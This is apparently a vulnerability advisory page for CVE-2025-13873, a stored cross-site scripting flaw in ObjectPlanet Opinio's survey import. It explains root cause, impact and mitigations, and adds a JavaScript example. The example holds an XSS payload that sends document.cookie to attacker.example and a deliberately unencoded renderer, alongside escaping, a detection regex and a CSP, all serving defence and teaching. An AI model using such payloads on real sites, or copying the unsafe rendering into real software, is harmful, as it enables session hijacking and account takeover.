CVE-2025-13873 in Opinio

Summary

by MITRE • 12/02/2025

Stored Cross-Site Scripting (XSS) in the survey-import feature of the ObjectPlanet Opinio 7.26 rev12562 web application allows an attacker to inject arbitrary JavaScript code, which executes in the browsing context of any visitor accessing the compromised survey.


Analysis

by VulDB Data Team • 12/05/2025

CVE-2025-13873 is a stored cross-site scripting flaw in ObjectPlanet Opinio 7.26 rev12562, located in the survey-import functionality. The application does not properly sanitize or encode data taken from an imported survey, so an attacker who is allowed to import a survey can plant a persistent JavaScript payload in the application's database. The survey-import feature lets administrators or survey authors load survey definitions from external files, which makes the import path an attack surface where unvalidated input later becomes executable code in the browser of anyone who views the survey. Note that the attacker therefore needs whatever privilege the product requires to import a survey; the victims are the survey's respondents and reviewers.

The root cause is inadequate input validation combined with missing output encoding in the survey-import module. When a survey is imported, content embedded in the survey structure, for example question text, answer options, or metadata, is neither validated on the way in nor escaped when it is rendered. Any JavaScript injected through the import is stored server-side and executed each time a user opens the affected survey; the victim needs no special privileges and, for a publicly reachable survey, need not be authenticated at all. The flaw sits at the application layer. The advisory does not state which import formats are affected; any format the product accepts for survey import that carries free-text fields is a potential delivery channel.

The operational impact goes beyond defacement or simple data theft, because the attacker's JavaScript runs with the full rights of the survey page in every visitor's browser. Typical follow-on attacks are session hijacking through cookie or token theft (where cookies lack the HttpOnly flag), credential harvesting via injected login forms, redirection to malicious sites, and delivery of browser exploits. Because the payload is stored, it persists until the survey content is cleaned or removed, which makes long-running surveys and surveys with a large or changing respondent population especially exposed. An attacker can use this to maintain a lasting presence in the application that affects every respondent, and, if an administrator or survey owner previews the survey, to take over higher-privileged accounts and the data they can reach.

Mitigation should start with the fix on the vendor side: imported survey content must be validated before storage, and, more importantly, HTML-encoded for the context in which it is rendered (element text, attribute value, URL, or script data) at output time. Input sanitization alone is not sufficient, because stored data may be rendered in several contexts and filters are routinely bypassed; contextual output encoding is the control that actually stops script execution. Operators can add defence in depth while a patch is pending: a Content Security Policy that forbids inline scripts and event handlers, tight access control so that only trusted accounts can import surveys, a web application firewall with XSS rules in front of the import endpoint, and review or logging of survey imports so that uploads containing markup or script handlers are flagged. Existing surveys should be audited for injected markup, since a fix does not remove payloads already in the database. The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). In MITRE ATT&CK terms, execution of the payload maps to T1059.007, Command and Scripting Interpreter: JavaScript.
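The following is an added example, not code from ObjectPlanet or from the VulDB analysis, showing the three pieces discussed above on a constructed survey document: a rendering path that concatenates stored survey fields into page markup (the pattern behind a stored XSS), the same renderer with contextual HTML output encoding, an import-time check that flags fields carrying markup or event handlers for review, and a nonce-based CSP value as a defence-in-depth layer. The JSON structure, field names and the attacker host are assumptions; Opinio's real import format is not known from the advisory.

```javascript
// Added example (not ObjectPlanet's code). The survey below is a constructed
// JSON document standing in for an imported survey; the field names are assumed.
const importedSurvey = {
  title: "Customer feedback",
  questions: [
    { id: 1, text: "How satisfied are you?", options: ["Very", "Somewhat", "Not at all"] },
    // A malicious importer has placed payloads in a question and an option.
    {
      id: 2,
      text: '<img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">Comments?',
      options: ["Yes", "<script>alert(1)</script>"],
    },
  ],
};

// Vulnerable rendering: stored text is concatenated straight into the markup,
// so any tag inside question text or options reaches the visitor's browser.
function renderSurveyUnsafe(survey) {
  let html = `<h1>${survey.title}</h1>`;
  for (const q of survey.questions) {
    html += `<p>${q.text}</p><ul>`;
    for (const o of q.options) html += `<li>${o}</li>`;
    html += "</ul>";
  }
  return html;
}

// HTML entity encoding for element text and double-quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: every stored field is encoded at output time, so the
// payloads above are displayed as literal text instead of being executed.
function renderSurveySafe(survey) {
  let html = `<h1>${escapeHtml(survey.title)}</h1>`;
  for (const q of survey.questions) {
    html += `<p>${escapeHtml(q.text)}</p><ul>`;
    for (const o of q.options) html += `<li>${escapeHtml(o)}</li>`;
    html += "</ul>";
  }
  return html;
}

// Import-time triage: report fields that contain tags, javascript: URLs or
// on*= handlers so an operator can review the upload before it goes live.
// This is a review aid only; pattern lists are bypassable, so output encoding
// remains the primary control.
const SUSPICIOUS = /<\s*\/?\s*[a-z][^>]*>|javascript\s*:|\bon[a-z]+\s*=/i;
function flagSuspiciousFields(survey) {
  const hits = [];
  if (SUSPICIOUS.test(survey.title)) hits.push("title");
  for (const q of survey.questions) {
    if (SUSPICIOUS.test(q.text)) hits.push(`question[${q.id}].text`);
    q.options.forEach((o, i) => {
      if (SUSPICIOUS.test(o)) hits.push(`question[${q.id}].options[${i}]`);
    });
  }
  return hits;
}

// Defence in depth: a CSP that only permits scripts carrying the per-response
// nonce blocks inline handlers and injected <script> elements even if an
// encoding step is missed somewhere. The nonce must be fresh per response.
function buildCsp(nonce) {
  return `default-src 'self'; script-src 'nonce-${nonce}'; object-src 'none'; base-uri 'self'`;
}

console.log(renderSurveyUnsafe(importedSurvey)); // payload reaches the page
console.log(renderSurveySafe(importedSurvey));   // payload shown as text
console.log(flagSuspiciousFields(importedSurvey));
console.log(buildCsp("r4nd0m"));
```

Run with `node survey-xss.js`. The unsafe renderer emits the `<img onerror>` and `<script>` payloads verbatim; the safe renderer emits `&lt;script&gt;alert(1)&lt;/script&gt;` and the triage function reports exactly the two injected fields. The CSP string is what the survey page's `Content-Security-Policy` header should carry, with a new random nonce generated per response and placed on the application's own script tags.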

Responsible

TCS-CERT

Reservation

12/02/2025

Disclosure

12/02/2025

Moderation

accepted

CPE

ready

EPSS

0.00027

KEV

no

Activities

very low
